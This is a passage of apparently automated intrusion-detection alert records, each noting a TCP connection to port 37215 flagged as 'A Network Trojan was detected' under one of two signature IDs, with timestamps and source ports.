            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.727749
            SID:2835222
            Source Port:34914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790431
            SID:2835222
            Source Port:51742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770555
            SID:2835222
            Source Port:58032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.413959
            SID:2829579
            Source Port:37608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.843520
            SID:2829579
            Source Port:51588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988980
            SID:2829579
            Source Port:39286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039431
            SID:2835222
            Source Port:50822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.767836
            SID:2835222
            Source Port:53066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872615
            SID:2835222
            Source Port:51444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336033
            SID:2835222
            Source Port:48796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.035306
            SID:2835222
            Source Port:41358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.697310
            SID:2829579
            Source Port:45022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808831
            SID:2829579
            Source Port:36394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837817
            SID:2835222
            Source Port:33122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.760962
            SID:2835222
            Source Port:42168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067555
            SID:2835222
            Source Port:43134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.078386
            SID:2835222
            Source Port:41928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.341884
            SID:2829579
            Source Port:32816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.043164
            SID:2835222
            Source Port:60518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.029904
            SID:2835222
            Source Port:45712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.916405
            SID:2829579
            Source Port:52340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.594530
            SID:2835222
            Source Port:50172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.900550
            SID:2835222
            Source Port:52736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.993994
            SID:2829579
            Source Port:54466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.059101
            SID:2829579
            Source Port:47244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936157
            SID:2829579
            Source Port:57860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834079
            SID:2829579
            Source Port:36876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863779
            SID:2835222
            Source Port:57552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.027800
            SID:2835222
            Source Port:45814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.815606
            SID:2829579
            Source Port:38896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.918864
            SID:2835222
            Source Port:46296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.537149
            SID:2829579
            Source Port:34314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.716897
            SID:2835222
            Source Port:47384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336919
            SID:2835222
            Source Port:42796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765602
            SID:2829579
            Source Port:49986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045759
            SID:2829579
            Source Port:38656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434288
            SID:2829579
            Source Port:39396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.727154
            SID:2829579
            Source Port:54978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842830
            SID:2835222
            Source Port:39180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058478
            SID:2829579
            Source Port:35548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.554934
            SID:2835222
            Source Port:47202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.715306
            SID:2829579
            Source Port:46826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.914565
            SID:2835222
            Source Port:41632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.549888
            SID:2829579
            Source Port:34090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.985421
            SID:2835222
            Source Port:34110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.000329
            SID:2829579
            Source Port:43312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.474307
            SID:2835222
            Source Port:36142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.951375
            SID:2835222
            Source Port:38220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870349
            SID:2829579
            Source Port:40396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.803777
            SID:2829579
            Source Port:38898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.651113
            SID:2829579
            Source Port:59492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953119
            SID:2835222
            Source Port:56746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.756597
            SID:2835222
            Source Port:56080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.083670
            SID:2829579
            Source Port:44750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743450
            SID:2835222
            Source Port:39904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995433
            SID:2829579
            Source Port:60004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748548
            SID:2835222
            Source Port:48674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807547
            SID:2829579
            Source Port:36198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857614
            SID:2829579
            Source Port:58830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849004
            SID:2835222
            Source Port:55240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067671
            SID:2829579
            Source Port:50394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885580
            SID:2835222
            Source Port:54850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.030780
            SID:2829579
            Source Port:54542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989473
            SID:2835222
            Source Port:52042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.696610
            SID:2835222
            Source Port:58244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988848
            SID:2829579
            Source Port:58288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.290680
            SID:2829579
            Source Port:44824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810875
            SID:2835222
            Source Port:34106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920202
            SID:2835222
            Source Port:35518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290171
            SID:2829579
            Source Port:37186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842661
            SID:2829579
            Source Port:45664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.745048
            SID:2829579
            Source Port:34730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910895
            SID:2835222
            Source Port:35966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.616342
            SID:2829579
            Source Port:41100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804350
            SID:2829579
            Source Port:33934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776966
            SID:2829579
            Source Port:37932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869476
            SID:2835222
            Source Port:44186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.312289
            SID:2835222
            Source Port:45752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.944462
            SID:2835222
            Source Port:60128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869909
            SID:2835222
            Source Port:40818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543990
            SID:2829579
            Source Port:44614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.686023
            SID:2829579
            Source Port:41858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.583961
            SID:2829579
            Source Port:58898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.957975
            SID:2829579
            Source Port:58048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.676401
            SID:2829579
            Source Port:50244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870727
            SID:2835222
            Source Port:48056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.737281
            SID:2829579
            Source Port:43598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.623508
            SID:2829579
            Source Port:44888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:46.572574
            SID:2835222
            Source Port:56898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.952106
            SID:2835222
            Source Port:54320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533162
            SID:2829579
            Source Port:51582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.999474
            SID:2829579
            Source Port:38038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.920142
            SID:2835222
            Source Port:42320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.996242
            SID:2835222
            Source Port:44322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790451
            SID:2829579
            Source Port:40034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778251
            SID:2835222
            Source Port:39908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.664050
            SID:2835222
            Source Port:40552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.760329
            SID:2829579
            Source Port:50854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.851069
            SID:2829579
            Source Port:35420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.511055
            SID:2829579
            Source Port:56600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.934077
            SID:2829579
            Source Port:57736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767067
            SID:2835222
            Source Port:57844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.231225
            SID:2835222
            Source Port:33200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.413900
            SID:2835222
            Source Port:52904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885687
            SID:2835222
            Source Port:58272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.486986
            SID:2829579
            Source Port:57588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869822
            SID:2829579
            Source Port:46522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.856313
            SID:2829579
            Source Port:37826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.059818
            SID:2829579
            Source Port:60424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.860853
            SID:2835222
            Source Port:40576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919110
            SID:2835222
            Source Port:35538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895345
            SID:2829579
            Source Port:45462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459674
            SID:2835222
            Source Port:45112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778329
            SID:2829579
            Source Port:55876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.582062
            SID:2835222
            Source Port:37528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.762351
            SID:2829579
            Source Port:60692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040157
            SID:2829579
            Source Port:60460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870334
            SID:2835222
            Source Port:54342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040439
            SID:2829579
            Source Port:57928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.779963
            SID:2829579
            Source Port:34470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412925
            SID:2835222
            Source Port:33822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.493970
            SID:2835222
            Source Port:60464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.414009
            SID:2829579
            Source Port:53220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.706560
            SID:2835222
            Source Port:49156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849281
            SID:2829579
            Source Port:45196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.932798
            SID:2835222
            Source Port:60234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.041913
            SID:2829579
            Source Port:35034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775566
            SID:2829579
            Source Port:32942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.341870
            SID:2835222
            Source Port:35730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.867905
            SID:2829579
            Source Port:36298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065089
            SID:2835222
            Source Port:41776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.092076
            SID:2829579
            Source Port:40926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887769
            SID:2829579
            Source Port:45154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753359
            SID:2835222
            Source Port:52556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.182817
            SID:2829579
            Source Port:45656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804470
            SID:2835222
            Source Port:55602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.939021
            SID:2835222
            Source Port:44422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.711083
            SID:2835222
            Source Port:46332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.445827
            SID:2829579
            Source Port:44698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735066
            SID:2835222
            Source Port:35498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.316987
            SID:2829579
            Source Port:60016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541234
            SID:2829579
            Source Port:46192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.534082
            SID:2835222
            Source Port:49188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.861479
            SID:2835222
            Source Port:51008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.564032
            SID:2835222
            Source Port:39548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.739000
            SID:2835222
            Source Port:37472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.861064
            SID:2829579
            Source Port:40014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728823
            SID:2835222
            Source Port:44146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892742
            SID:2835222
            Source Port:60346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060074
            SID:2835222
            Source Port:45382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.860596
            SID:2835222
            Source Port:55782
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.485871
            SID:2829579
            Source Port:48566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.319980
            SID:2829579
            Source Port:52094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837532
            SID:2829579
            Source Port:48002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927361
            SID:2835222
            Source Port:51594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856726
            SID:2829579
            Source Port:35996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.651209
            SID:2835222
            Source Port:54824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.903405
            SID:2829579
            Source Port:51264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.942419
            SID:2835222
            Source Port:51008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.544084
            SID:2829579
            Source Port:41720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.073149
            SID:2835222
            Source Port:41724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068575
            SID:2835222
            Source Port:45584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827940
            SID:2835222
            Source Port:46228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.611491
            SID:2835222
            Source Port:35410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507578
            SID:2829579
            Source Port:37062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849521
            SID:2829579
            Source Port:45380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.262238
            SID:2835222
            Source Port:54408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994886
            SID:2835222
            Source Port:57784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.047995
            SID:2829579
            Source Port:34386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.276120
            SID:2829579
            Source Port:34020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.730135
            SID:2835222
            Source Port:53298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870290
            SID:2835222
            Source Port:35440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.715612
            SID:2829579
            Source Port:38340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.064121
            SID:2835222
            Source Port:49208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.951261
            SID:2835222
            Source Port:41584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290434
            SID:2835222
            Source Port:40066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.922637
            SID:2829579
            Source Port:53190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.025423
            SID:2829579
            Source Port:34678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.786603
            SID:2829579
            Source Port:60940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.437081
            SID:2835222
            Source Port:35574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665243
            SID:2829579
            Source Port:34184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.948886
            SID:2829579
            Source Port:52130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.771389
            SID:2829579
            Source Port:34460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.847236
            SID:2829579
            Source Port:48694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.740793
            SID:2829579
            Source Port:43900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.507251
            SID:2829579
            Source Port:52282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.444178
            SID:2829579
            Source Port:53208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371419
            SID:2835222
            Source Port:37882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.524340
            SID:2835222
            Source Port:50176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.435715
            SID:2829579
            Source Port:57216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735965
            SID:2829579
            Source Port:50300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012524
            SID:2835222
            Source Port:54298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.076778
            SID:2835222
            Source Port:47446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832751
            SID:2829579
            Source Port:46814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871509
            SID:2835222
            Source Port:57778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.446536
            SID:2835222
            Source Port:59390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.899274
            SID:2835222
            Source Port:53318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
